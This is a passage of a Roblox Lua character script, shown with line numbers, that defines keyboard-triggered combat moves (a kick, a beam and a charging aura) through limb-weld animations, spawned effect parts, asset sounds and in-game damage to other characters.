11526
if Debounces.on == false then break end
11527
wait()
11528
end
11529
z20 = Instance.new("Sound", larm)
11530
z20.SoundId = "http://www.roblox.com/asset/?id=206083107"
11531
z20.Volume = .6
11532
z20.Pitch = pt[math.random(1,#pt)]
11533
z20.Looped = false
11534
z20:Play()
11535
for i = 1, 3 do
11536
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.5,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-50)), 0.92)
11537
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.5,0)*CFrame.Angles(math.rad(60),math.rad(20),math.rad(-20)), 0.92)
11538
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(50),0), 0.92)
11539
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(math.rad(0), math.rad(-50), 0), 0.92)
11540
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.6, -1, 0) * CFrame.Angles(math.rad(10), math.rad(50), math.rad(-15)), 0.92)
11541
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.6, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(50), math.rad(15)), 0.92)
11542
if Debounces.on == false then break end
11543
wait()
11544
end
11545
z:Destroy()
11546
z2:Destroy()
11547
z3:Destroy()
11548
z4:Destroy()
11549
z5:Destroy()
11550
z6:Destroy()
11551
z7:Destroy()
11552
z8:Destroy()
11553
z9:Destroy()
11554
z10:Destroy()
11555
z11:Destroy()
11556
z12:Destroy()
11557
z13:Destroy()
11558
z14:Destroy()
11559
z15:Destroy()
11560
z16:Destroy()
11561
z17:Destroy()
11562
z18:Destroy()
11563
z19:Destroy()
11564
z20:Destroy()
11565
Debounces.LPunch = false
11566
Debounces.RPunch = false
11567
Debounces.ks = false
11568
Debounces.ks2 = false
11569
if Debounces.CanAttack == false then
11570
Debounces.CanAttack = true
11571
Debounces.on = false
11572
Debounces.NoIdl = false
11573
end
11574
end
11575
end
11576
end)
11577
-------------------------------
11578
mouse.KeyDown:connect(function(key)
11579
	if key == "t" then
11580
		if Debounces.CanAttack == true then
11581
			Debounces.CanAttack = false
11582
			Debounces.NoIdl = true
11583
			Debounces.on = true
11584
			Debounces.ks = true
11585
    kik = rleg.Touched:connect(function(ht)
11586
        hit = ht.Parent
11587
            if ht and hit:IsA("Model") then
11588
                    if hit:FindFirstChild("Humanoid") then
11589
                        if hit.Name ~= p.Name then
11590
                            --[[if Debounces.Slashing == true and Debounces.Slashed == false then
11591
                                    Debounces.Slashed = true]]--
11592
                                    if Debounces.ks==true then
11593
                                    z = Instance.new("Sound",hed)
11594
                                    z.SoundId = "rbxassetid://169380525"
11595
                                    z.Volume = 1
11596
                                    z:Play()
11597
                                    Debounces.ks=false
11598
                                    end
11599
                                    hit:FindFirstChild("Humanoid"):TakeDamage(2)
11600
                                    hit:FindFirstChild("Torso").Velocity = hit:FindFirstChild("Torso").CFrame.lookVector * -300
11601
                            --Debounces.Slashed = false
11602
                        --end
11603
                    end
11604
                end
11605
            elseif ht and hit:IsA("Hat") then
11606
                if hit.Parent.Name ~= p.Name then
11607
                    if hit.Parent:FindFirstChild("Humanoid") then
11608
                           --[[if Debounces.Slashing == true and Debounces.Slashed == false then
11609
                                    Debounces.Slashed = true]]--
11610
                                    hit.Parent:FindFirstChild("Humanoid"):TakeDamage(2)
11611
                                    hit:FindFirstChild("Torso").Velocity = hit:FindFirstChild("Torso").CFrame.lookVector * -300
11612
                            --Debounces.Slashed = false
11613
                        --end
11614
                    end
11615
                end
11616
            end
11617
        end)
11618
			for i = 1,20 do
11619
				rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.62,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(8)), 0.4)
11620
				larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.62,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(-110)), 0.4)
11621
				hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(0),math.rad(0),0), 0.4)
11622
				torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, 0, 0) * CFrame.Angles(0, math.rad(90), math.rad(90)), 0.4)
11623
				lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(-90)), 0.4)
11624
				rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(10)), 0.4)
11625
				if Debounces.on == false then break end
11626
				rs:wait()
11627
			end
11628
			kik:disconnect()
11629
			if Debounces.CanAttack == false then
11630
				Debounces.CanAttack = true
11631
				Debounces.NoIdl = false
11632
				Debounces.on = false
11633
            end
11634
        end
11635
    end
11636
end)
11637
----------------------------------------------------
11638
mouse.KeyDown:connect(function(key)
11639
	if key == "y" then
11640
		if Debounces.CanAttack == true then
11641
            Debounces.CanAttack = false
11642
            Debounces.on = true
11643
            Debounces.NoIdl = true
11644
				for i = 1, 15 do
11645
					rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,.6,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(30)), 0.2)
11646
					larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,.6,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(-90)), 0.6)
11647
					hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,0)*CFrame.Angles(math.rad(-14),math.rad(90),0), 0.2)
11648
					torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(-90), 0), 0.4)
11649
					lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(-10)), 0.2)
11650
					rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(10)), 0.2)
11651
                    if Debounces.on == false then break end
11652
                    rs:wait(2.7)
11653
                end
11654
				x = Instance.new("Sound",char)
11655
				x.SoundId = "rbxassetid://228343271"
11656
				x.Pitch = 1
11657
				x.Volume = .8
11658
				wait(.1)
11659
				x:Play()
11660
				Debounces.on = false
11661
				Debounces.Here = false
11662
				shot = shot + 1
11663
local rng = Instance.new("Part", larm)
11664
rng.Anchored = true
11665
rng.BrickColor = BrickColor.new("Royal purple")
11666
rng.CanCollide = false
11667
rng.FormFactor = 3
11668
rng.Name = "Ring"
11669
rng.Size = Vector3.new(1, 1, 1)
11670
rng.Transparency = 0.35
11671
rng.TopSurface = 0
11672
rng.BottomSurface = 0
11673
rng2 = rng:clone()
11674
rng3 = rng2:clone()
11675
rng4 = rng2:clone()
11676
local rngm = Instance.new("SpecialMesh", rng)
11677
rngm.MeshId = "http://www.roblox.com/asset/?id=3270017"
11678
rngm.Scale = Vector3.new(10, 10, 1)
11679
rngm2 = rngm:clone()
11680
rngm2.Scale = Vector3.new(5, 5, 3)
11681
rngm3=rngm2:clone()
11682
rngm3.Parent = rng3
11683
rngm3.Scale = Vector3.new(8, 8, 1)
11684
rngm4 = rngm2:clone()
11685
rngm4.Parent = rng4
11686
rngm4.Scale = Vector3.new(6, 6, 1)
11687
local bem = Instance.new("Part", larm)
11688
bem.Anchored = true
11689
bem.BrickColor = BrickColor.new("Really black")
11690
bem.CanCollide = false
11691
bem.FormFactor = 3
11692
bem.Name = "Beam" .. shot
11693
bem.Size = Vector3.new(1, 1, 1)
11694
bem.Transparency = 0.35
11695
bem.TopSurface = 0
11696
bem.BottomSurface = 0
11697
local bemm = Instance.new("SpecialMesh", bem)
11698
bemm.MeshType = 4
11699
bemm.Scale = Vector3.new(1, 4, 4)
11700
local out = Instance.new("Part", larm)
11701
out.Anchored = true
11702
out.BrickColor = BrickColor.new("Really black")
11703
out.CanCollide = false
11704
out.FormFactor = 3
11705
out.Name = "Out"
11706
out.Size = Vector3.new(4, 4, 4)
11707
out.Transparency = 0.35
11708
out.TopSurface = 0
11709
out.BottomSurface = 0
11710
local outm = Instance.new("SpecialMesh", out)
11711
outm.MeshId = "http://www.roblox.com/asset/?id=1033714"
11712
outm.Scale = Vector3.new(6, 4, 6)
11713
local bnd = Instance.new("Part", larm)
11714
bnd.Anchored = true
11715
bnd.BrickColor = BrickColor.new("Really red")
11716
bnd.CanCollide = false
11717
bnd.FormFactor = 3
11718
bnd.Name = "Bend"
11719
bnd.Size = Vector3.new(1, 1, 1)
11720
bnd.Transparency = 1
11721
bnd.TopSurface = 0
11722
bnd.BottomSurface = 0
11723
local bndm = Instance.new("SpecialMesh", bnd)
11724
bndm.MeshType = 3
11725
bndm.Scale = Vector3.new(8, 8, 8)
11726
out.CFrame = larm.CFrame * CFrame.new(0, -2.7, 0)
11727
bem.CFrame = out.CFrame * CFrame.new(0, -2.5, 0) * CFrame.Angles(0, 0, math.rad(90))
11728
bnd.CFrame = bem.CFrame * CFrame.new(0, 0, 0)
11729
rng.CFrame = out.CFrame * CFrame.Angles(math.rad(90), 0, 0)
11730
rng3.CFrame = rng.CFrame * CFrame.new(0, -.5, 0)
11731
rng4.CFrame = rng.CFrame * CFrame.new(0, -1, 0)
11732
Debounces.Shewt = true
11733
coroutine.wrap(function()
11734
for i = 1, 20, 0.2 do
11735
rngm.Scale = Vector3.new(10 + i*2, 10 + i*2, 1)
11736
rngm3.Scale = Vector3.new(8 + i*3, 8 + i*3, 1)
11737
rngm4.Scale = Vector3.new(6 + i*4, 6 + i*4, 1)
11738
rng.Transparency = i/20
11739
rng3.Transparency = 1/24
11740
rng4.Transparency = i/26
11741
wait()
11742
end
11743
wait()
11744
rng:Destroy()
11745
end)()
11746
if Debounces.Shewt == true then
11747
larm:WaitForChild("Beam" .. shot).Touched:connect(function(ht)
11748
hit = ht.Parent
11749
if hit:IsA("Model") and hit:findFirstChild("Humanoid") then
11750
if HasntTouched(hit.Name) == true and deb == false then
11751
deb = true
11752
coroutine.wrap(function()
11753
hit:FindFirstChild("Humanoid").PlatformStand = true
11754
hit:FindFirstChild("Torso").Velocity = char.Head.CFrame.lookVector * 180
11755
hit:FindFirstChild("Humanoid"):TakeDamage(math.random(24,73))
11756
end)()
11757
table.insert(Touche, hit.Name)
11758
deb = false
11759
end
11760
elseif hit:IsA("Hat") and hit.Parent:findFirstChild("Humanoid") then
11761
if HasntTouched(hit.Parent.Name) == true and deb == false then
11762
deb = true
11763
coroutine.wrap(function()
11764
hit.Parent:FindFirstChild("Humanoid").PlatformStand = true
11765
hit.Parent:FindFirstChild("Torso").Velocity = char.Head.CFrame.lookVector * 180
11766
wait(1)
11767
hit.Parent:FindFirstChild("Humanoid").PlatformStand = false
11768
end)()
11769
table.insert(Touche, hit.Parent.Name)
11770
deb = false
11771
for i, v in pairs(Touche) do
11772
print(v)
11773
end
11774
end
11775
end
11776
end)
11777
end
11778
for i = 0, 260, 8 do
11779
bem.Size = Vector3.new(i, 3, 3)
11780
out.CFrame = larm.CFrame * CFrame.new(0, -2.7, 0)
11781
bem.CFrame = larm.CFrame * CFrame.new(0, -4.2 -(i/2), 0) * CFrame.Angles(0, 0, math.rad(90))
11782
bnd.CFrame = bem.CFrame * CFrame.new(-i/2, 0, 1.2)
11783
bnd.Size = Vector3.new(1,1,1)
11784
bndm.Scale = Vector3.new(8,8,8)
11785
if i % 10 == 0 then
11786
local newRng = rng2:Clone()
11787
newRng.Parent = larm
11788
newRng.CFrame = larm.CFrame * CFrame.new(0, -4.2-i, 0) * CFrame.Angles(math.rad(90), 0, 0)
11789
local newRngm = rngm2:clone()
11790
newRngm.Parent=newRng
11791
coroutine.wrap(function()
11792
for i = 1, 10, 0.2 do
11793
newRngm.Scale = Vector3.new(8 + i*2, 8 + i*2, 3)
11794
newRng.Transparency = i/10
11795
wait()
11796
end
11797
wait()
11798
newRng:Destroy()
11799
end)()
11800
end
11801
wait()
11802
end
11803
wait()
11804
Debounces.Shewt = false
11805
bem:Destroy()
11806
out:Destroy()
11807
bnd:Destroy()
11808
Debounces.Ready = false
11809
for i, v in pairs(Touche) do
11810
table.Remove(Touche, i)
11811
end
11812
wait()
11813
table.insert(Touche, char.Name)
11814
Debounces.NoIdl = false
11815
if Debounces.CanAttack == false then
11816
Debounces.CanAttack = true
11817
end
11818
end
11819
end
11820
end)
11821
----------------------------------------------------
11822
--[[mouse.KeyDown:connect(function(key)
11823
	if key == "y" then
11824
		if Debounces.CanAttack == true then
11825
			Debounces.CanAttack = false
11826
			Debounces.NoIdl = true
11827
			Debounces.on = true
11828
				local shell = Instance.new("Part",torso)
11829
				shell.BrickColor = BrickColor.new("Royal purple")
11830
				shell.Anchored = false
11831
				shell.CanCollide = false
11832
				shell.Locked = true
11833
				shell.TopSurface = "SmoothNoOutlines"
11834
				shell.BottomSurface = "SmoothNoOutlines"
11835
				shell.Size = Vector3.new(1.2,1.2,1.2)
11836
				shell.FormFactor = 3
11837
				local shellm = Instance.new("SpecialMesh",shell)
11838
				shellm.MeshType = "Sphere"
11839
				shellm.Scale = Vector3.new(1.2,1.2,1.2)
11840
				Omega = function()
11841
					local X = Instance.new("Part",char)
11842
					local O = Instance.new("ObjectValue",X)
11843
					O.Name = "creator"
11844
					X.Locked = true
11845
					X.Name = "Shell"
11846
					X.Anchored = false
11847
					X.CanCollide = false
11848
					X.Transparency = 0.5
11849
					X.Reflectance = 0
11850
					X.BottomSurface = 0
11851
					X.TopSurface = 0
11852
					X.Shape = 0
11853
					local V = Instance.new("ObjectValue",X)
11854
					V.Value = char
11855
					V.Name = "creator"
11856
					X.BrickColor = BrickColor.new("Royal purple")
11857
					X.Size = Vector3.new(40,40,40)
11858
					--X.Material = "Neon"
11859
					local Z = Instance.new("SpecialMesh",X)
11860
					Z.MeshType = "Sphere"
11861
					Z.Scale = Vector3.new(0.2,0.2,0.2)
11862
					X.CFrame = rarm.CFrame*CFrame.new(0,-6,0)
11863
					local bv = Instance.new("BodyVelocity",X)
11864
					bv.maxForce = Vector3.new(99999,99999,99999)
11865
					X.CFrame = CFrame.new(X.Position,root.CFrame.lookVector*10)
11866
					bv.velocity = root.CFrame.lookVector*10
11867
					Explode = X.Touched:connect(function(hit)
11868
						if hit ~= char and hit.Name ~= "Shell" and hit ~= X and hit:IsA("Part") or hit:IsA("BasePart}") then
11869
							local cf = X.CFrame
11870
							bv:Destroy()
11871
							X.Anchored = true
11872
							Z:Remove()
11873
							Explode:disconnect()
11874
							X.Size = Vector3.new(3,3,3)
11875
							X.Touched:connect(function(hit) end)
11876
							X.CanCollide = false
11877
							for i,v in pairs(FindNearestTorso(X.CFrame.p,200))do
11878
								if v:FindFirstChild('Humanoid') then
11879
									v.Humanoid:TakeDamage(math.random(80,120))
11880
								end
11881
							end
11882
								for i = 1, (40) do rs:wait()
11883
									X.Transparency = X.Transparency + (1/40)
11884
									X.Size = X.Size + Vector3.new(1,1,1)
11885
									X.CFrame = root.CFrame * CFrame.new(0,0,-10)
11886
								end
11887
							X:Destroy()
11888
							end
11889
						end)
11890
					end
11891
			for i = 1,200 do
11892
				shell.CFrame = rarm.CFrame * CFrame.new(0,-1,0)
11893
				rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.3,0.62,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(170)), 0.03)
11894
				larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.62,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(0)), 0.4)
11895
				hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(0),math.rad(0),0), 0.4)
11896
				torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, 0, 0) * CFrame.Angles(0, math.rad(0), math.rad(0)), 0.4)
11897
				lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(0)), 0.4)
11898
				rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(0)), 0.4)
11899
				if Debounces.on == false then break end
11900
				rs:wait()
11901
			end
11902
			for i = 1,30 do
11903
				shell.CFrame = torso.CFrame * CFrame.new(0,8,0)
11904
				rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.3,0.62,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(170)), 0.4)
11905
				larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.3,0.62,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(-170)), 0.4)
11906
				hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(0),math.rad(0),0), 0.4)
11907
				torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, 0, 0) * CFrame.Angles(0, math.rad(0), math.rad(0)), 0.4)
11908
				lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(0)), 0.4)
11909
				rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(0)), 0.4)
11910
				if Debounces.on == false then break end
11911
				rs:wait()
11912
			end
11913
			for i = 1,40 do
11914
				shell.CFrame = torso.CFrame * CFrame.new(0,20,0)
11915
				shell.Size = shell.Size + Vector3.new(1,1,1)
11916
				rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.4,0.6,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(100)), 0.4)
11917
				larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.4,0.6,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(-100)), 0.4)
11918
				hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(0),math.rad(0),0), 0.4)
11919
				torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, 0, 0) * CFrame.Angles(0, math.rad(0), math.rad(0)), 0.4)
11920
				lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(0)), 0.4)
11921
				rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(0)), 0.4)
11922
				if Debounces.on == false then break end
11923
				rs:wait()
11924
			end
11925
			for i = 1,40 do
11926
				shell.CFrame = torso.CFrame * CFrame.new(0,0,-30)
11927
				rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.4,0.6,0)*CFrame.Angles(math.rad(-50),math.rad(0),math.rad(20)), 0.4)
11928
				larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.4,0.6,0)*CFrame.Angles(math.rad(-50),math.rad(0),math.rad(-20)), 0.4)
11929
				hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(0),math.rad(0),0), 0.4)
11930
				torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, 0, 0) * CFrame.Angles(0, math.rad(0), math.rad(0)), 0.4)
11931
				lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(0)), 0.4)
11932
				rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(0)), 0.4)
11933
				if Debounces.on == false then break end
11934
				rs:wait()
11935
			end
11936
			for i = 1,60 do
11937
				shell.CFrame = torso.CFrame * CFrame.new(0,0,-60)
11938
				rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.4,0.64,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-30)), 0.4)
11939
				larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.4,0.64,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(30)), 0.4)
11940
				hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(0),math.rad(0),0), 0.4)
11941
				torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, 0, 0) * CFrame.Angles(0, math.rad(0), math.rad(0)), 0.4)
11942
				lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(0)), 0.4)
11943
				rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(0)), 0.4)
11944
				if Debounces.on == false then break end
11945
				rs:wait()
11946
			end
11947
			for i = 1,60 do
11948
				shell.CFrame = torso.CFrame * CFrame.new(0,0,-60)
11949
				shell.Size = shell.Size + Vector3.new(1,1,1)
11950
				rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.4,0.64,0)*CFrame.Angles(math.rad(110),math.rad(0),math.rad(120)), 0.4)
11951
				larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.4,0.64,0)*CFrame.Angles(math.rad(110),math.rad(0),math.rad(-120)), 0.4)
11952
				hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(0),math.rad(0),0), 0.4)
11953
				torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, 0, 0) * CFrame.Angles(0, math.rad(0), math.rad(0)), 0.4)
11954
				lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(0)), 0.4)
11955
				rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(0)), 0.4)
11956
				if Debounces.on == false then break end
11957
				rs:wait()
11958
			end
11959
			if Debounces.CanAttack == false then
11960
				Debounces.CanAttack = true
11961
				Debounces.NoIdl = false
11962
				Debounces.on = false
11963
            end
11964
        end
11965
    end
11966
end)]]--
11967
----------------------------------------------------
11968
Charging = false
11969
mouse.KeyDown:connect(function(key)
11970
	if key == "r" then
11971
		if Charging == false then
11972
			Charging = true
11973
			if Debounces.CanAttack == true then
11974
				Debounces.CanAttack = false
11975
				Debounces.NoIdl = true
11976
				Debounces.on = true
11977
				for i = 1,20 do
11978
					rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.2,0.65,-.4)*CFrame.Angles(math.rad(130),math.rad(0),math.rad(-40)), 0.2)
11979
					larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.2,0.65,-.4)*CFrame.Angles(math.rad(130),math.rad(0),math.rad(40)), 0.2)
11980
					hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-10),math.rad(0),0), 0.2)
11981
					torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, 0, 0) * CFrame.Angles(math.rad(-10), math.rad(0), 0), 0.2)
11982
					lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, .4, -0.8) * CFrame.Angles(math.rad(-6), math.rad(0), math.rad(0)), 0.2)
11983
					rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, .4, -0.8) * CFrame.Angles(math.rad(-6), math.rad(0), math.rad(0)), 0.2)
11984
					if Debounces.on == false then break end
11985
					rs:wait()
11986
				end
11987
				--[[for i = 1,20 do
11988
					rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.65,0)*CFrame.Angles(math.rad(-20),math.rad(-20),math.rad(50)), 0.4)
11989
					larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.65,0)*CFrame.Angles(math.rad(-20),math.rad(20),math.rad(-50)), 0.4)
11990
					hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,.1)*CFrame.Angles(math.rad(34),math.rad(0),0), 0.4)
11991
					torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, 0, 0) * CFrame.Angles(math.rad(15), math.rad(0), math.rad(0)), 0.4)
11992
					lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(-10), 0, math.rad(-10)), 0.4)
11993
					rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(-10), 0, math.rad(10)), 0.4)
11994
					if Debounces.on == false then break end
11995
					rs:wait()
11996
				end]]--
11997
pt=Instance.new('Part',torso)
11998
pt.Anchored=true
11999
pt.CanCollide=false
12000
pt.Locked = true
12001
pt.FormFactor='Custom'
12002
pt.Size=Vector3.new(1,1,1)
12003
pt.CFrame=root.CFrame*CFrame.new(0,-1,0)
12004
pt.Transparency=.6
12005
pt.BrickColor=BrickColor.new('Really black')
12006
msh=Instance.new('SpecialMesh',pt)
12007
msh.MeshId='http://www.roblox.com/asset/?id=20329976'
12008
msh.Scale=Vector3.new(8,4,8)
12009
pt2=pt:clone()
12010
pt2.Parent = torso
12011
pt2.CFrame=root.CFrame*CFrame.new(0,-1,0)
12012
pt2.BrickColor=BrickColor.new("Royal purple")
12013
msh2=msh:clone()
12014
msh2.Parent=pt2
12015
msh2.Scale=Vector3.new(10,5,10)
12016
12017
custommath={25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,-25,-26,-27,-28,-29,-30,-31,-32,-33,-34,-35,-36,-37,-38,-39,-40,-41,-42,-43,-44,-45,-46,-47,-48,-49,-50,-51,-52,-53,-54,-55,-56,-57,-58,-59,-60,-61,-62,-63,-64,-65,-66,-67,-68,-69,-70,-71,-72,-73,-74,-75,-76,-77,-78,-79,-80,-81,-82,-83,-84,-85,-86,-87,-88,-89,-90,-91,-92,-93,-94,-95,-96,-97,-98,-99,-100}
12018
12019
bl = Instance.new("Part", char)
12020
bl.Locked = true
12021
bl.Name = "Shell"
12022
bl.BrickColor = BrickColor.new("Really black")
12023
bl.Anchored = true
12024
bl.CanCollide = false
12025
bl.Transparency = 0
12026
bl.Reflectance = 0
12027
bl.BottomSurface = 0
12028
bl.TopSurface = 0
12029
bl.Shape = 0
12030
blm = Instance.new("SpecialMesh",bl)
12031
blm.MeshType = "Sphere"
12032
blm.Scale = Vector3.new(1,1,1)
12033
blm.MeshId = "rbxassetid://9982590"
12034
12035
	coroutine.resume(coroutine.create(function()
12036
        for i=1, math.huge, 4 do
12037
			if Charging == true then
12038
				rs:wait()
12039
				bl.CFrame = root.CFrame * CFrame.new(0, 0, 0) * CFrame.Angles(math.rad(-i/10), math.rad(-i/10), math.rad(i/10))
12040
				blm.Scale = blm.Scale + Vector3.new(0.1, 0.1, 0.1)
12041
				bl.Transparency = bl.Transparency + 0.005
12042
				pt.CFrame = root.CFrame*CFrame.new(0,-1,0) * CFrame.Angles(0,math.rad(i*2),0)
12043
				pt2.CFrame = root.CFrame*CFrame.new(0,-1,0) * CFrame.Angles(0,math.rad(-i*2),0)
12044
				msh.Scale = msh.Scale + Vector3.new(0.05,0,0.05)
12045
				msh2.Scale = msh2.Scale + Vector3.new(0.05,0,0.05)
12046
				elseif Charging == false then break
12047
			end
12048
		end
12049
    end))
12050
12051
repeat
12052
    local p = Instance.new('Part',torso)
12053
    p.formFactor = 'Custom'
12054
    p.Size = Vector3.new(1,1,1)
12055
    p.BrickColor = workspace.Base.BrickColor
12056
    p.CanCollide = false
12057
    p.Transparency = 0
12058
    p.Anchored = true
12059
    p.Locked=true
12060
    p.Material = workspace.Base.Material
12061
    s = math.random(1,40)/10
12062
    local m = Instance.new("BlockMesh",p)
12063
    m.Scale = Vector3.new(s,s,s)
12064
    p.CFrame = torso.CFrame*CFrame.new(custommath[math.random(1,#custommath)]/10,-math.random(5,7),custommath[math.random(1,#custommath)]/10)*CFrame.Angles(math.random(),math.random(),math.random())
12065
	--[[coroutine.wrap(function()
12066
		wait(2)
12067
		while Charging == true do
12068
		wait(2)
12069
		GroundWave1()
12070
		wait(2)
12071
		end
12072
	end)()]]--
12073
	Spawn(function()
12074
		while rs:wait() do
12075
			if Charging == true then
12076
				rarm.Weld.C0 = CFrame.new(1.5,0.65,0)*CFrame.Angles(math.rad(math.random(-36,-20)),math.rad(math.random(-30,-20)),math.rad(math.random(30,50)))
12077
				larm.Weld.C0 = CFrame.new(-1.5,0.65,0)*CFrame.Angles(math.rad(math.random(-36,-20)),math.rad(math.random(20,30)),math.rad(math.random(-50,-30)))
12078
				hed.Weld.C0 = CFrame.new(0,1.5,.1)*CFrame.Angles(math.rad(math.random(26,34)),math.rad(math.random(-5,5)),math.rad(0))
12079
				torso.Weld.C0 = CFrame.new(0, 0, 0) * CFrame.Angles(math.rad(10), math.rad(math.random(-4,4)), math.rad(0))
12080
				lleg.Weld.C0 = CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(math.random(-10,-6)), math.rad(math.random(10,20)), math.rad(math.random(-20,-10)))
12081
				rleg.Weld.C0 = CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(math.random(-10,-6)), math.rad(math.random(-20,-10)), math.rad(math.random(10,20)))
12082
